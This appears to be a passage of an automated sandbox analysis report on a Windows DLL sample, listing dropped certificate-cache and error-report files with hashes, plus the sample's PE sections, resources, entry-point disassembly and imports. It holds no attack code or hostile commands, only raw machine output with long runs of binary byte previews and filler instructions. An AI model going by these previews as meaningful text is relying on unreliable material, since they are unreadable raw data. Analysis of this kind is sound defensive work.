                                          Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.8.8.<./.P.i.d.>.......
                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E05.tmp.xml
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4670
                                          Entropy (8bit):4.499769207747317
                                          Encrypted:false
                                          SSDEEP:48:cvIwSD8zsh+JgtWI9PHWSC8B38fm8M4JCdskZFZ/+q8/OUI4SrSzd:uITfyA2SN6J6xWIDWzd
                                          MD5:59B8DDA35D74C8B446A03E4151C42BBF
                                          SHA1:D027BD07FF6DA891E751B51C62020FDF4460AAA1
                                          SHA-256:9FF7392F9F75347DF35384DF41EB348B5C74C8C6277A92C9EDBD34A893B85C15
                                          SHA-512:EED65DD074EA17A93339B90F83E467323EF7A297091FAFA2340A29BB99B63FA5800274837695FA1E54C324A70228A38201FF572E83BAC923254B063A221AACDE
                                          Malicious:false
                                          Reputation:low
                                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1185876" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1391
                                          Entropy (8bit):7.705940075877404
                                          Encrypted:false
                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview: 0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                          Category:dropped
                                          Size (bytes):61157
                                          Entropy (8bit):7.995991509218449
                                          Encrypted:true
                                          SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                          MD5:AB5C36D10261C173C5896F3478CDC6B7
                                          SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                          SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                          SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                          Malicious:false
                                          Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8408FE5CA4467EE4DA84A76EF238FE3
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1306
                                          Entropy (8bit):7.470818786872256
                                          Encrypted:false
                                          SSDEEP:24:yvLxG88i7ZDlwjwN9CMDy0cjHbpLZ+cq0EoUbaeswo+Ks2FCU:UG8nZZVmNjHVM6Eos9jK5
                                          MD5:E829E65D7C4307D6FBC13C179E037A36
                                          SHA1:A053375BFE84E8B748782C7CEE15827A6AF5A405
                                          SHA-256:67ADD1166B020AE61B8F5FC96813C04C2AA589960796865572A3C7E737613DFD
                                          SHA-512:96C5793B2B57D8DF5891C94015720960E0DA4C2CF8CE1FC5707A0B46E5DB8CE3761FB5FDB430F619D1579F13E80FBDD973EF6A024129ED039AA193273158FCAD
                                          Malicious:false
                                          Preview: 0...0............+.J....S...%._Z0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...200904000000Z..250915160000Z021.0...U....US1.0...U....Let's Encrypt1.0...U....R30.."0...*.H.............0...........(........U.....zB..]&..+..L...k.u...G..U5W....9...<B.Nn.;.....\.Y8...i.Z.....$%..7q.........;ERE...S.4.R...`p.T..m...@4k+.f.f4|.k..W)..0.].ro....X=......+.....q].F..%...`guf.....\.S.:..G......w?.S......p...c.......S...H...i.%u...R...Q.............0...0...U...........0...U.%..0...+.........+.......0...U.......0.......0...U...........XV.P.@........0...U.#..0...y.Y.{....s.....X..n02..+........&0$0"..+.....0...http://x1.i.lencr.org/0'..U... 0.0.......http://x1.c.lencr.org/0"..U. ..0.0...g.....0...+..........0...*.H...............NG>...D...gx..c.uM..=3erT-...... ._.p..n;.^... ......<...9..|%.G.en?F....+.T....'K.../...q.J...#{.-...W>...3.G!x..'.*...\.d...y.O.mD.^.........D).Y .c.!..&..W..e..."...C....~...7.Z..0..n+*.!N....
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):192
                                          Entropy (8bit):2.7842198674325394
                                          Encrypted:false
                                          SSDEEP:3:kkFklRFw9NvfllXlE/zMciyJ1NNX8RolJuRdyo1dlUKlGXJlDdt:kKPS1iyJ7NMa8Rdy+UKcXP
                                          MD5:7AE616B55A29C8505F726240ABC85B0F
                                          SHA1:C1C46FA524580F4EBCA2107F4B751607F2F63933
                                          SHA-256:38AA9D7D5C2D9F877E73FCDD27D07BF46DAE6297530BA4B590DB2FA3F221BFAC
                                          SHA-512:D2F4FECF999AFF679DB7B3939B5EAD033B97F397EDA90E3B634B4ED54A5CAB7EEF523808C4668CE00B24B36EEB9F4BB7CE62AF52F7D1DD2EB1273329EBEEDFC3
                                          Malicious:false
                                          Preview: p...... .........A......(....................................................... ..........~...GW..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):326
                                          Entropy (8bit):3.0964598364242013
                                          Encrypted:false
                                          SSDEEP:6:kK75dFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:TX2kPlE99SNxAhUefit
                                          MD5:669EBA4F4FB6EF5A66277178DE9E2659
                                          SHA1:37698480F62DEC0AA1AC743D8789462789381182
                                          SHA-256:9BBCBCFDD718DE8CBD330333FEC94C4614CE16F8374B943431D5FA1CFBF28C6E
                                          SHA-512:5276F38E75F541CAA2F5F6EB62ED92B7B637FFE9049B5790D780CF208286ECAE407762CC83496C8B484A1E35D185DBFD32B68D6452778A043BDD44EE426F78F8
                                          Malicious:false
                                          Preview: p...... .........e......(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...
                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8408FE5CA4467EE4DA84A76EF238FE3
                                          Process:C:\Windows\System32\loaddll32.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):192
                                          Entropy (8bit):2.7522317973800585
                                          Encrypted:false
                                          SSDEEP:3:kkFklnP9vvfllXlE/tdKje11U+lJuRdxPlIXlel9OlMHt:kKswoyUa8RdE169OlMN
                                          MD5:52B3591D077ADE6D088390032D66145E
                                          SHA1:1C0228694D9B32B76D37E72F3D7CCB257240AE35
                                          SHA-256:8EC8EB06F5C2AE3ADEDB131447832F35261102EC1B2CACF59D236847B60BAF1F
                                          SHA-512:46B1BC89A929B6F28BBDC26790455C2D43B6A20FE9D4E76571E13BD87307CE6FE29E956CA81BCEF8E7B8752909EF427E9D68B84A1C554A2A188DC5E15817051A
                                          Malicious:false
                                          Preview: p...... ................(....................................................... ..................................h.t.t.p.:././.r.3...i...l.e.n.c.r...o.r.g./...".6.0.2.7.2.6.5.0.-.5.1.a."...

                                          Static File Info

                                          General

                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):6.5524835197332045
                                          TrID:
                                          • Win32 Dynamic Link Library (generic) (1002004/3) 97.97%
                                          • Win32 Executable Delphi generic (14689/80) 1.44%
                                          • Win16/32 Executable Delphi generic (2074/23) 0.20%
                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                          • DOS Executable Generic (2002/1) 0.20%
                                          File name:p2SijKiqgZ.dll
                                          File size:519145
                                          MD5:803768a34f7e59b8a9a2f3969624c47e
                                          SHA1:09a38940ef023929897fdc9c996de0b0f39116e2
                                          SHA256:2a0a88a2e5f9cafa10a48d63bdfcdf965b72c25978ab46cf28e795dbedc9624a
                                          SHA512:21e4aa621360a4ec4a0c73fad494e133f2584f92d058a72772e390c7bf1e1ad3e4d0778e95b590c663fe5efed3cfbecb08d5e78e1216c1bfbef729062806722f
                                          SSDEEP:12288:+xyHC8LAE/azElTT4c7Bo+526Tb/jXiQle601:eb8LxazE9X7C96Tz7iA/C
                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                          File Icon

                                          Icon Hash:b99988fcd4f66e0f

                                          Static PE Info

                                          General

                                          Entrypoint:0x459424
                                          Entrypoint Section:CODE
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                          DLL Characteristics:
                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:5097c68ca7573db2997ab353ba37473b

                                          Entrypoint Preview

                                          Instruction
                                          push ebp
                                          mov ebp, esp
                                          add esp, FFFFFFC4h
                                          mov eax, 004591ECh
                                          call 00007F8E14946101h
                                          xor ecx, ecx
                                          mov dl, 01h
                                          mov eax, dword ptr [00458C50h]
                                          call 00007F8E14987147h
                                          call 00007F8E14943EFEh
                                          nop
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5d0000x206e.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x670000x16400.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x600000x6510.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          CODE0x10000x584480x58600False0.51845937942data6.53539139446IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          DATA0x5a0000x12380x1400False0.4306640625data4.0726295466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          BSS0x5c0000xc810x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .idata0x5d0000x206e0x2200False0.354319852941data4.89147485587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .reloc0x600000x65100x6600False0.630399816176data6.67541395632IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                          .rsrc0x670000x164000x16400False0.602977966994data6.57916045616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_CURSOR0x67b6c0x134data
                                          RT_CURSOR0x67ca00x134data
                                          RT_CURSOR0x67dd40x134data
                                          RT_CURSOR0x67f080x134data
                                          RT_CURSOR0x6803c0x134data
                                          RT_CURSOR0x681700x134data
                                          RT_CURSOR0x682a40x134data
                                          RT_CURSOR0x683d80x134data
                                          RT_BITMAP0x6850c0x1d0data
                                          RT_BITMAP0x686dc0x1e4data
                                          RT_BITMAP0x688c00x1d0data
                                          RT_BITMAP0x68a900x1d0data
                                          RT_BITMAP0x68c600x1d0data
                                          RT_BITMAP0x68e300x1d0data
                                          RT_BITMAP0x690000x1d0data
                                          RT_BITMAP0x691d00x1d0data
                                          RT_BITMAP0x693a00x1d0data
                                          RT_BITMAP0x695700x1d0data
                                          RT_BITMAP0x697400xe8GLS_BINARY_LSB_FIRST
                                          RT_ICON0x698280x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 49, next used block 48059EnglishUnited States
                                          RT_DIALOG0x69b100x52data
                                          RT_STRING0x69b640x374data
                                          RT_STRING0x69ed80x1dcdata
                                          RT_STRING0x6a0b40x154data
                                          RT_STRING0x6a2080x240data
                                          RT_STRING0x6a4480x184data
                                          RT_STRING0x6a5cc0xe8data
                                          RT_STRING0x6a6b40x154data
                                          RT_STRING0x6a8080x498data
                                          RT_STRING0x6aca00x354data
                                          RT_STRING0x6aff40x3e8data
                                          RT_STRING0x6b3dc0x234data
                                          RT_STRING0x6b6100xecdata
                                          RT_STRING0x6b6fc0x1b4data
                                          RT_STRING0x6b8b00x3e4data
                                          RT_STRING0x6bc940x358data
                                          RT_STRING0x6bfec0x2b4data
                                          RT_RCDATA0x6c2a00x10data
                                          RT_RCDATA0x6c2b00x10c9adataDutchNetherlands
                                          RT_RCDATA0x7cf4c0x2ccdata
                                          RT_RCDATA0x7d2180x101Delphi compiled form 'TForm1'
                                          RT_GROUP_CURSOR0x7d31c0x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3300x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3440x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3580x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d36c0x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3800x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3940x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_CURSOR0x7d3a80x14Lotus unknown worksheet or configuration, revision 0x1
                                          RT_GROUP_ICON0x7d3bc0x14dataEnglishUnited States

                                          Imports

                                          DLLImport
                                          kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                          user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                          oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                          kernel32.dllTlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc
                                          advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                          kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                          version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                          gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetTextColor, GetSystemPaletteEntries, GetStockObject, GetROP2, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                          user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                          kernel32.dllSleep
                                          oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                          ole32.dllCoCreateInstance, CoUninitialize, CoInitialize
                                          oleaut32.dllCreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
